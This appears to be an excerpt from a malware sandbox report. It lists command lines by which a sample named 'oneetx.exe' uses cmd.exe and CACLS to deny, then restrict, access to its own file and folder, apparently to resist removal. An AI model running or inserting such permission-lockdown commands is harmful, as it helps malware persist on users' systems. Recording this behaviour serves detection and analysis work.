cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\fd369298e4" /P "test22:N"&&CACLS "..\fd369298e4" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:R" /E
cmdline CACLS "oneetx.exe" /P "test22:N"
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\fd369298e4" /P "test22:N"&&CACLS "..\fd369298e4" /P "test22:R" /E&&Exit
cmdline CACLS "..\fd369298e4" /P "test22:N"